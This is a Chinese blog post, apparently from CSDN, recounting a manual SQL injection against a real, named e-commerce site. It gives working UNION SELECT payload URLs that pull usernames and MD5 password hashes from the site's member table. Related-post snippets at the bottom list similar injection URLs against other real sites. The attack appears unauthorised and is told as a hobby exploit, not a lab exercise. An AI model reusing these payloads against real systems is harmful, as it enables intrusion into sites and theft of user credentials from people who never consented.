mysql php 注入_记一次php手工注入(mysql)

最新推荐文章于 2021-04-04 14:33:33 发布
最新推荐文章于 2021-04-04 14:33:33 发布
阅读量125 收藏
点赞数
文章标签: mysql php 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39947812/article/details/113136727
版权

光说不练假把式,关于脚本入侵看的心痒,就实践了一把。

首先google:inurl:"php?id="

发现这个网站可get注入:

http://brand.66wz.com/store.php?id=18

试了下http://brand.66wz.com/store.php?id=18 and user>0

有反应,网页上出现错误提示:

AAffA0nNPuCLAAAAAElFTkSuQmCC

然后输入

http://brand.66wz.com/store.php?id=18 and order by 5

报错:

AAffA0nNPuCLAAAAAElFTkSuQmCC

根据提示,改为:

http://brand.66wz.com/store.php?id=18 ORDER BY 5 DESC LIMIT 0,20

页面正常:

AAffA0nNPuCLAAAAAElFTkSuQmCC

再将5改为30,错误。

改为20,正常。

······

最后得到的临界值为24。

AAffA0nNPuCLAAAAAElFTkSuQmCC

AAffA0nNPuCLAAAAAElFTkSuQmCC

然后通过火狐的插件得到下面网址:

http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from tables

后面的tables我试了很多单词,如admin什么的,都不行。

本来到这里就该结束了。

后来感觉太可惜了,抱着试一试的心态从网页的源代码取了点关键词百度了一下,发现了跟这个网站很多相关的信息:(http://zhangjianbin.iteye.com/blog/1631387)

其中有:

brand_admincp_group 管理组

brand_admincp_member 管理员

brand_admincp_perm 管理员权限

brand_adminsession 管理员与店铺管理员登录次数与信息判断

brand_members 会员信息

最后连源代码都有了:http://code1.okbase.net/codefile/tool.func.php_2012121116304_79.htm

然后进入:

http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from brand_members

AAffA0nNPuCLAAAAAElFTkSuQmCC

ok!10可以插入字段。

分别插入username以及password就得到了用户名以及md5加密的密码:

AAffA0nNPuCLAAAAAElFTkSuQmCC

AAffA0nNPuCLAAAAAElFTkSuQmCC

那么怎么匹配username和passeord呢,用穿山甲扫描的时候发现还有一个uid字段:

AAffA0nNPuCLAAAAAElFTkSuQmCC

所以只要在网址中分别添上"where uid=xxxxx"就行了。

比如说:

http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,username,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from brand_members where uid=555157

AAffA0nNPuCLAAAAAElFTkSuQmCC

http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from brand_members where uid=555157

AAffA0nNPuCLAAAAAElFTkSuQmCC

再后来,md5解密的时候发现。。。

乌云上已经有这个网站的漏洞了:

http://www.wooyun.org/bugs/wooyun-2010-046524

还真是有够年久了。

weixin_39947812
关注
mysql union as 注入_Mysql 手工注入【常规 Union 查询篇】
weixin_42499681的博客
02-17 281
文章来源于:lsh4ck's Blog在开始真正的注入技巧之前,我们先来大致回顾下必要的 mysql 数据库基础下面是注入 Mysql 时经常会用到的一些单行函数,熟练使用是灵活注入的前提,尤其是在对抗一些 Waf 的时候字符串连接函数,将多个字符串连接成一个字符串,注意,中间只要字符串有一个为空,最后结果也为空 同样是连接多个字符串,但可以在开头指定分隔符,跟 concat()稍微不同,它会自动...
mysql post手工注入_pikachu-数字型注入(post)#手工注入
weixin_39842237的博客
02-07 718
1,因为是post型,所以需要抓取数据包2,测试结果为数字型注入提交恒等的语句可以查询到所有的数据信息3,使用UNION联合查询法判断字段数,测试为2个字段时没有报错,所以可以判断字段数为24,爆字段 #发现两个都可以查询5,查询数据库 #可以查到数据库名称为 pikachu6,查数据库pikachu下的表 #可以查到库pikachu下面有5个表(httpinfo,member,message,u...
PHP手工注入经典教程
12-12
特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。
php注释符手工注入,php手工注入
weixin_29359515的博客
03-10 168
http://www.rfidchina.org/products/product.php?id=9740URL后面加上'后,返回的页面虽然没有什么错误信息之类的,页面出错缺失了内容,然后是and 1=1 、and 1=2 ,分别是正常信息和'的页面,在9740前面加了个负号“ - ” ,它没什么意义,和and 1=2 一个作用,出错,http://www.rfidchina.org/produc...
PHP手工注入初探
冰点的博客
08-18 119
注:为了网站的安全,对网址做了处理 ***目标:http://www.lawxxxxxxx.com.cn 注入页面:http://www.lawxxxxxxx.com.cn/article.php?nid=2377 http://www.lawyerxxxx.com.cn/article.php?nid=2377 order by 15 出错,那...
PHP手工注入
曲终人散
06-11 1601
后台 www.c**bio.com/mywebmanage     查询版本 http://www/**yjt.com/show_news.php?id=1480 UNION SELECT 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16   5.1   数据库名   tt
php手工注入拿webshell
weixin_30344795的博客
08-03 187
  目标网站:http://www.xxx.org.cn:81   注入点: http://www.xxx.org.cn:81/news.php?id=780   1.认识注入类型   不管是asp.aspx.php,注入的标准类型必为   http://www.xxxx.com/aa.asp?p=xxx   http://www.xxxx.com/aa.aspx?p=xxx   ht...
PHPmysql手工注入
10-12
PHP手工注入,全称MySQL手工SQL注入,是指攻击者通过输入恶意的SQL语句,利用应用程序对用户输入数据的不恰当处理,从而操控数据库,获取敏感信息或执行非授权操作。这种攻击方式通常发生在开发者未对用户输入进行...
PHP+MySQL 手工注入语句大全 推荐
10-29
标题中提到的“PHP+MySQL手工注入语句大全推荐”以及描述中提到的“PHP MYSQL手工注射”的知识点主要包括了如何利用SQL注入技术在PHP开发的网站中,通过MySQL数据库的漏洞来获取敏感信息或控制系统。由于这些操作在...
没有结果的···PHP+MYSQL手工注入某网站1
08-08
从给定的信息来看,本文将围绕一次针对特定网站的手工SQL注入攻击进行展开,并从中提炼出涉及的关键技术点。此过程不仅包括了SQL注入的基本原理和技术实现方式,还涉及到了利用MySQL的一些高级特性来获取更深入的...
PHPMySQL注入防御代码_PHP+SQL 注入攻击的技术实现以及预防办法
weixin_29661797的博客
02-08 208
1. php 配置文件 php.ini 中的 magic_quotes_gpc 选项没有打开,被置为 off2. 开发者没有对数据类型进行检查和转义不过事实上,第二点最为重要。我认为, 对用户输入的数据类型进行检查,向 MYSQL 提交正确的数据类型,这应该是一个 web 程序员最最基本的素质。但现实中,常常有许多小白式的 Web 开发者忘了这点, 从而导致后门大开。为什么说第二点最为重要?因为如...
php注入教程,PHP手工注入教程
weixin_30454067的博客
03-10 315
一.检测字段长度http://www.osy-wine.com/news_show.php?id=-61 order by 24 报错 说明字段长度是24查看数据库信息http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22...
php手工注入 --,PHP手工注入初探
weixin_39616222的博客
04-04 133
http://www.lawyerxxxx.com.cn/article.php?nid=2377 order by 15 出错,那么就是14http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-------------------------...
SQL 注入:Sqli-labs (1-65通关)、sqlmap、注入常用函数
freeking101的博客
07-26 4585
SQL 注入:Sqli-labs (1-65通关)、sqlmap、注入常用函数
手工PHP注入详解
叱诧冰子 ′
01-21 414
在这个注入风靡的时代,多少菜鸟拿着工具四处冲锋.如果你不想成为工具的奴隶,不想遇到PHP就退避三舍,不想继续做着ASP的菜鸟之群,不 想......那么请你静下心来, 随我一同走完这次的入侵检测全过程. <br />      相信你必然能有所收获.不只在技术上,更在思路上,更在意识上..判断是否存在注入:首先,PHP和ASP判断注入的方法一样,在一个动态连接后面加上and 1=1,and 1=2看其返回结果即可判断.两次返回结果不相同,即可初步判断为有注入点.   判断字段大小:接下来,对付php猜字段的
PHP+MySQL手工注入
D.K专栏
04-10 2873
1、发现注入点: 202.1.160.100/xycms/showproducts.php?id=12 and 1=1 202.1.160.100/xycms/showproducts.php?id=12 and 1=2 发现在1=1中,正确显示内容 在1=2中,没有任何显示。可以判定,此处存在SQL注入 2、判断数据库列的数量 利用order by 语句,如下面所示: 202.1.
SQL Injection with MySQL
11-11 1454
本文作者:angel文章性质:原创发布日期:2004-09-16本文已经发表在《黑客防线》7月刊,转载请注明。由于写了很久,随着技术的进步,本人也发现该文里有不少错误和罗嗦的地方。请各位高手看了不要笑。本文写于《Advanced SQL Injection with MySQL》之前一个月。声明  本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有
PHP+MySQL注入
Jim的博客
08-15 565
一.访问文件系统 1.读文件 MySQL允许使用load data infile和load_file命令将文本文件读到数据库中。 首先创建一个文本文件users.txt 创建数据表:create table authors (fname char(20), sname char(20), email char(100), flag int); 导入数据库:load data infile
php手工注入语句,PHP+MySQL 手工注入语句大全
weixin_42138716的博客
03-10 295
PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下。暴字段长度Order by num/*匹配字段and 1=1 union select 1,2,3,4,5…….n/*暴字段位置and 1=2 union select 1,2,3,4,5……n/*利用内置函数暴数据库信息version() database() user()不用猜解可用字段暴数据库信息(有些网站...
PHP+MYSQL手工注入实战:获取ROOT权限与数据库连接文件
在这个关于PHPMySQL手工注入攻击的文章中,作者分享了一次对一个具有ROOT权限的PHP网站的探索过程。攻击者利用SQL注入漏洞,通过构造精心设计的SQL语句,首先确定了网站存在15个可能的注入点。他们利用`UNION ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值